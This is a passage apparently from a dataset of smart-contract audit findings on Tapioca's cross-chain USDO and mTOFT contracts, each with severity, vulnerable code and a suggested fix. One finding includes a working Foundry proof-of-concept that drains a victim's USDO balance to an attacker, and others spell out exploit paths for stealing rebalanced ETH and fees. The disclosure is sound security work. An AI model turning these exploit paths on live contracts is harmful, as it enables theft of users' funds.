_srcAddress,\\n uint256 _nonce,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _dstGasForCall,\\n address _to,\\n Pool.SwapObj memory _s,\\n bytes memory _payload\\n) internal {\\n Pool pool = _getPool(_dstPoolId);\\n // first try catch the swap remote\\n try pool.swapRemote(_srcChainId, _srcPoolId, _to, _s) returns (uint256 amountLD) {\\n if (_payload.length > 0) {\\n // then try catch the external contract call\\n try IStargateReceiver(_to).sgReceive{gas: _dstGasForCall}(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _payload) {\\n // do nothing\\n } catch (bytes memory reason) {\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(pool.token(), amountLD, _to, _payload);\\n emit CachedSwapSaved(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _to, _payload, reason);\\n }\\n }\\n } catch {\\n revertLookup[_srcChainId][_srcAddress][_nonce] = abi.encode(\\n TYPE_SWAP_REMOTE_RETRY,\\n _srcPoolId,\\n _dstPoolId,\\n _dstGasForCall,\\n _to,\\n _s,\\n _payload\\n );\\n emit Revert(TYPE_SWAP_REMOTE_RETRY, _srcChainId, _srcAddress, _nonce);\\n }\\n}\\n```\\n\\nAs payload is empty in case of using the `routerETH` contract the `sgReceive` function is never called. This means that the ETH is left sitting inside the `mTOFT` contract.\\n```\\n## TapiocaOmnichainSender.sol\\n\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n external\\n payable\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n // @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n\\n // @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) =\\n _buildOFTMsgAndOptions(_lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD);\\n\\n // @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }\\n```\\n\\nAll he has to do is specify the option type `lzNativeDrop` inside the `_lsSendParams.extraOptions` and the cost of calling `_lzSend` plus the airdrop amount will be paid out from the balance of `mTOFT`.\\nAs this is a complete theft of the rebalanced amount I'm rating this as a critical vulnerability.ч```\\nfunction swapETHAndCall(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n SwapAmount memory _swapAmount, // the amount and the minimum swap amount\\n IStargateRouter.lzTxObj memory _lzTxParams, // the LZ tx params\\n bytes calldata _payload // the payload to send to the destination\\n ) external payable {\\n```\\nчAll ETH can be stolen during rebalancing for mTOFTs that hold native tokens.ч```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n -exerciseOptionsReceiver() Lack of Ownership Check for oTAP, Allowing Anyone to Use oTAPTokenIDчhighчIn UsdoOptionReceiverModule.exerciseOptionsReceiver(): For this method to execute successfully, the `owner` of the `oTAPTokenID` needs to approve it to `address(usdo)`. Once approved, anyone can front-run execute `exerciseOptionsReceiver()` and utilize this authorization.\\nIn `USDO.lzCompose()`, it is possible to specify `_msgType == MSG_TAP_EXERCISE` to execute `USDO.exerciseOptionsReceiver()` across chains.\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n\\nFor this method to succeed, USDO must first obtain approve for the `oTAPTokenID`.\\nExample: The owner of `oTAPTokenID` is Alice.\\nalice in A chain execute lzSend(dstEid = B) with\\ncomposeMsg = [oTAP.permit(usdo,oTAPTokenID,v,r,s) 2.exerciseOptionsReceiver(oTAPTokenID,_options.from=alice) 3. oTAP.revokePermit(oTAPTokenID)]\\nin chain B USDO.lzCompose() will\\nexecute oTAP.permit(usdo,oTAPTokenID)\\nexerciseOptionsReceiver(srcChainSender=alice,_options.from=alice,oTAPTokenID )\\noTAP.revokePermit(oTAPTokenID)\\nThe signature of `oTAP.permit` is public, allowing anyone to use it.\\nNote: if alice call approve(oTAPTokenID,usdo) in chain B without signature, but The same result\\nThis opens up the possibility for malicious users to front-run use this signature. Let's consider an example with Bob:\\nBob in Chain A uses Alice's signature (v, r, s):\\ncomposeMsg = [oTAP.permit(usdo, oTAPTokenID, v, r, s), exerciseOptionsReceiver(oTAPTokenID, _options.from=bob)]-----> (Note: `_options.from` should be set to Bob.)\\nIn Chain B, when executing `USDO.lzCompose(dstEid = B)`, the following actions occur:\\nExecute `oTAP.permit(usdo, oTAPTokenID)`\\nExecute `exerciseOptionsReceiver(srcChainSender=bob, _options.from=bob, oTAPTokenID)`\\nAs a result, Bob gains unconditional access to this `oTAPTokenID`.\\nIt is advisable to check the ownership of `oTAPTokenID` is `_options.from` before executing `ITapiocaOptionBroker(_options.target).exerciseOption()`.чadd check `_options.from` is owner or be approved\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n\\n// rest of code\\n uint256 bBefore = balanceOf(address(this));\\n// Add the line below\\n address oTap = ITapiocaOptionBroker(_options.target).oTAP();\\n// Add the line below\\n address oTapOwner = IERC721(oTap).ownerOf(_options.oTAPTokenID);\\n// Add the line below\\n require(oTapOwner == _options.from\\n// Add the line below\\n || IERC721(oTap).isApprovedForAll(oTapOwner,_options.from)\\n// Add the line below\\n || IERC721(oTap).getApproved(_options.oTAPTokenID) == _options.from\\n// Add the line below\\n ,\"invalid\");\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n }\\n```\\nчThe `exerciseOptionsReceiver()` function lacks ownership checks for `oTAP`, allowing anyone to use `oTAPTokenID`.ч```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n -Wrong parameter in remote transfer makes it possible to steal all USDO balance from usersчhighчSetting a wrong parameter when performing remote transfers enables an attack flow where USDO can be stolen from users.\\nThe following bug describes a way to leverage Tapioca's remote transfers in order to drain any user's USDO balance. Before diving into the issue, a bit of background regarding compose calls is required in order to properly understand the attack.\\nTapioca allows users to leverage LayerZero's compose calls, which enable complex interactions between messages sent across chains. Compose messages are always preceded by a sender address in order for the destination chain to understand who the sender of the compose message is. When the compose message is received, `TapiocaOmnichainReceiver.lzCompose()` will decode the compose message, extract the `srcChainSender_` and trigger the internal `_lzCompose()` call with the decoded `srcChainSender_` as the sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. \\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n\\nOne of the type of compose calls supported in tapioca are remote transfers. When the internal `_lzCompose()` is triggered, users who specify a msgType equal to `MSG_REMOTE_TRANSFER` will make the `_remoteTransferReceiver()` internal call be executed:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n\\n // rest of code\\n\\n}\\n```\\n\\nRemote transfers allow users to burn tokens in one chain and mint them in another chain by executing a recursive `_lzSend()` call. In order to burn the tokens, they will first be transferred from an arbitrary owner set by the function caller via the `_internalTransferWithAllowance()` function.\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, \\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nAfter transferring the tokens via `_internalTransferWithAllowance()`, `_internalRemoteTransferSendPacket()` will be triggered, which is the function that will actually burn the tokens and execute the recursive `_lzSend()` call:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _internalRemoteTransferSendPacket( \\n address _srcChainSender,\\n LZSendParam memory _lzSendParam, \\n bytes memory _composeMsg\\n ) internal returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt) {\\n // Burn tokens from this contract\\n (uint256 amountDebitedLD_, uint256 amountToCreditLD_) = _debitView(\\n _lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid \\n ); \\n _burn(address(this), amountToCreditLD_); \\n \\n // rest of code\\n \\n // Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD_, _srcChainSender \\n ); // msgSender is the sender of the composed message. We keep context by passing `_srcChainSender`.\\n \\n // Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // rest of code\\n }\\n```\\n\\nAs we can see, the `_lzSend()` call performed inside `_internalRemoteTransferSendPacket()` allows to trigger the remote call with another compose message (built using the `_buildOFTMsgAndOptionsMemory()` function). If there is an actual `_composeMsg` to be appended, the sender of such message will be set to the `_internalRemoteTransferSendPacket()` function's `_srcChainSender` parameter.\\nThe problem is that when `_internalRemoteTransferSendPacket()` is called, the parameter passed as the source chain sender is set to the arbitrary owner address supplied by the caller in the initial compose call, instead of the actual source chain sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n // rest of code\\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, // <------ This parameter will become the _srcChainSender in the recursive compose message call\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nThis makes it possible for an attacker to create an attack vector that allows to drain any user's USDO balance. The attack path is as follows:\\nExecute a remote call from chain A to chain B. This call has a compose message that will be triggered in chain B.\\nThe remote transfer message will set the arbitrary `owner` to any victim's address. It is important to also set the amount to be transferred in this first compose call to 0 so that the `attacker` can bypass the allowance check performed inside the `_remoteTransferReceiver()` call.\\nWhen the compose call gets executed, a second packed compose message will be built and triggered inside `_internalRemoteTransferSendPacket()`. This second compose message will be sent from chain B to chain A, and the source chain sender will be set to the arbitrary `owner` address that the `attacker` wants to drain due to the incorrect parameter being passed. It will also be a remote transfer action.\\nWhen chain A receives the compose message, a third compose will be triggered. This third compose is where the token transfers will take place. Inside the `_lzReceive()` triggered in chain A, the composed message will instruct to transfer and burn a certain amount of tokens (selected by the `attacker` when crafting the attack). Because the source chain sender is the victim address and the `owner` specified is also the victim, the `_internalTransferWithAllowance()` executed in chain A will not check for allowances because the `owner` and the spender are the same address (the victim's address). This will burn the attacker's desired amount from the victim's wallet.\\nFinally, a last `_lzSend()` will be triggered to chain B, where the burnt tokens in chain A will be minted. Because the compose calls allow to set a specific recipient address, the receiver of the minted tokens will be the `attacker`.\\nAs a summary: the attack allows to combine several compose calls recursively so that an attacker can burn victim's tokens in Chain A, and mint them in chain B to a desired address. The following diagram summarizes the attack for clarity:\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_stealUSDOFromATargetUserDueToWrongParameter() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n \\n deal(address(aUsdo), makeAddr(\"victim\"), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // FINAL MESSAGE A ---> B \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: makeAddr(\"victim\"), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: bytes(\"\"),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes(\"\") // next message\\n );\\n\\n // SECOND MESSAGE B ---> A \\n\\n SendParam memory sendParamBToA = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 0, // IMPORTANT: This must be set to 0 to bypass the allowance check performed inside `_remoteTransferReceiver()`\\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(\"victim\"), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: toeComposeMsgVictim,\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n bytes(\"\") // next message\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n vm.startPrank(makeAddr(\"attacker\"));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // This triggers a message back to chain A, in which the srcChainSender will be set as the victim inside the\\n // composed message due to the wrong parameter passed\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Chain A: message is received, internally a compose flow is retriggered.\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n toeComposeMsgVictim\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // At this point, the srcChainSender is the victim (as set in the previous lzCompose) because of the wrong parameter (the `expectEmit` verifies it).\\n // The `owner` specified for the remote transfer is also the victim, so the allowance check is bypassed because `owner` == `srcChainSender`.\\n // This allows the tokens to be burnt, and a final message is triggered to the destination chain\\n UsdoReceiver(address(aUsdo)).lzCompose(\\n address(aUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(makeAddr(\"victim\"))), toeComposeMsgVictim), // message (srcChainSender becomes victim because of wrong parameter set)\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Back to chain B. Finally, the burnt tokens from the victim in chain A get minted in chain B with the attacker set as the destination\\n {\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, bUsdo.decimalConversionRate());\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n }\\n\\n // Finished: victim gets drained, attacker obtains balance of victim\\n assertEq(bUsdo.balanceOf(makeAddr(\"victim\")), 0);\\n assertEq(bUsdo.balanceOf(makeAddr(\"attacker\")), 100 ether);\\n \\n } \\n```\\n\\nRun the poc with the following command: `forge test --mt testVuln_stealUSDOFromATargetUserDueToWrongParameter`\\nThe proof of concept shows how in the end, the victim's `aUsdo` balance will become 0, while all the `bUsdo` in chain B will be minted to the attacker.чChange the parameter passed in the `_internalRemoteransferSendPacket()` call so that the sender in the compose call built inside it is actually the real source chain sender. This will make it be kept along all the possible recursive calls that might take place:\\n```\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n// Remove the line below\\n remoteTransferMsg_.owner,\\n// Add the line below\\n _srcChainSender\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n emit RemoteTransferReceived(\\n remoteTransferMsg_.owner,\\n remoteTransferMsg_.lzSendParam.sendParam.dstEid,\\n OFTMsgCodec.bytes32ToAddress(remoteTransferMsg_.lzSendParam.sendParam.to),\\n remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n );\\n }\\n```\\nчHigh. An attacker can drain any USDO holder's balance and transfer it to themselves.ч```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. \\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n -Recursive _lzCompose() call can be leveraged to steal all generated USDO feesчhighчIt is possible to steal all generated USDO fees by leveraging the recursive _lzCompose() call triggered in compose calls.\\nThe `USDOFlashloanHelper` contract allows users to take USDO flash loans. When a user takes a flash loan some fees will be enforced and transferred to the USDO contract:\\n```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n\\nSuch fees can be later retrieved by the owner of the USDO contract via the `extractFees()` function:\\n```\\n// Usdo.sol\\nfunction extractFees() external onlyOwner { \\n if (_fees > 0) {\\n uint256 balance = balanceOf(address(this));\\n\\n uint256 toExtract = balance >= _fees ? _fees : balance;\\n _fees -= toExtract;\\n _transfer(address(this), msg.sender, toExtract);\\n }\\n }\\n```\\n\\nHowever, such fees can be stolen by an attacker by leveraging a wrong parameter set when performing a compose call.\\nWhen a compose call is triggered, the internal `_lzCompose()` call will be triggered. This call will check the `msgType_` and execute some logic according to the type of message requested. After executing the corresponding logic, it will be checked if there is an additional message by checking the `nextMsg_.length`. If the compose call had a next message to be called, a recursive call will be triggered and `_lzCompose()` will be called again:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n } else if (!_extExec(msgType_, tapComposeMsg_)) { \\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if ( \\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) { \\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_, \\n tapComposeMsg_\\n ); \\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAs we can see in the code snippet's last line, if `nextMsg_.length > 0` an additional compose call can be triggered . The problem with this call is that the first parameter in the `_lzCompose()` call is hardcoded to be `address(this)` (address of USDO), making the `srcChainSender_` become the USDO address in the recursive compose call.\\nAn attacker can then leverage the remote transfer logic in order to steal all the USDO tokens held in the USDO contract (mainly fees generated by flash loans).\\nForcing the recursive call to be a remote transfer, `_remoteTransferReceiver()` will be called. Because the source chain sender in the recursive call is the USDO contract, the `owner` parameter in the remote transfer (the address from which the remote transfer tokens are burnt) can also be set to the USDO address, making the allowance check in the `_internalTransferWithAllowance()` call be bypassed, and effectively burning a desired amount from USDO.\\n```\\n// USDO.sol\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n \\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n 